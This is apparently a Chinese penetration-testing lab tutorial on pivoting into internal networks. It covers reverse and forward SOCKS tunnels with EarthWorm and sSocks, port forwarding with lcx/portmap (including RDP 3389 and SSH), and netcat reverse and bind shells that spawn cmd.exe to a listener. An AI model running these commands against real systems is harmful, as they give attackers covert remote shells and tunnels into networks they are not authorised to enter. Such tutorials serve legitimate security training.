流量转发
socks代理工具
Termite 是EW(EarthWorm)的最新版,官方链接: http://rootkiter.com/Termite/
主要特性: 多平台支持、跳板机互联、正反向级联、小巧无依赖、内置Shell令主机管理更方便
sSocks 工具地址: http://sourceforge.net/projects/ssocks/
sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,其最新版为0.0.14
下载解压后,执行命令编译。
nsocks 类似通过Socks5代理后的netcat,可用来测试socks server ssocksd 用来开启Socks5代理服务 ssocks 本地启用Socks5服务,并反弹到另一IP地址 rcsocks 接收反弹过来的Socks5服务,并转向另一端口
反向代理实验步骤:
将kali 和 win03 都安装EW工具
2
在公网服务器(kali 3.106)上执行以下命令:
./ew_for_linux64 -s rcsocks -l 1080 -e 1024 监听本机的1080端口转发到反连1024端口的主机
kaili配置两块网卡
在目标机器执行以下命令
.\ew_for_Win.exe -s rssocks -d 192.168.3.106 -e 1024 通过socks隧道连接公网IP的1024端口
与公网服务器连接成功. 并且在火狐开启代理
服务器(kali)ip
正向代理
./ew -s ssocksd -l 8888 开启 8888 端口的 socks 代理 (kaili服务器 )
配置火狐浏览器
端口转发
lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,
portmap实验步骤:公网主机Centos
先在具有公网ip的主机上执行:
./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777 意思是监听来自6666端口的请求,将其转发到7777端口
再在内网主机上执行:
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666
意思就是将内网主机22端口的流量转发到公网主机的6666端口
然后在Linux系统命令行下执行
ssh 公网主机ip 7777
即可连接内网主机。
nc 反弹
反向连接实验步骤:kali(外网ip) win03(内网ip)
kali开启监听端口 nc - lvvp 4444
2.
win03 输入指令 nc -t -e cmd.exe 192.168.3.106(公网ip) 4444
3.
可以看见反弹成功
正向连接实验步骤:win03作为远程主机 kali作为本机
控制端主动连接被控制端
远程主机上执行:
nc -l -p 4444 -t -e cmd.exe
2.
本地主机上执行:
nc -vv 远程主机ip 4444
连接成功
lcx 内网端口转发
实验步骤:公网主机win03 内网主机 win08r2
08上输入指令
lcx -slave 公网主机ip 4444 127.0.0.1 3389
意思是把内网主机的 3389 端口转发到具有公网ip主机的 4444 端口
公网主机win03执行命令
Lcx –listen 公网主机端口1(内网主机给转发过来的端口) 公网主机端口2
lcx -listen 4444 6666
打开远程连接验证
公网ip 端口号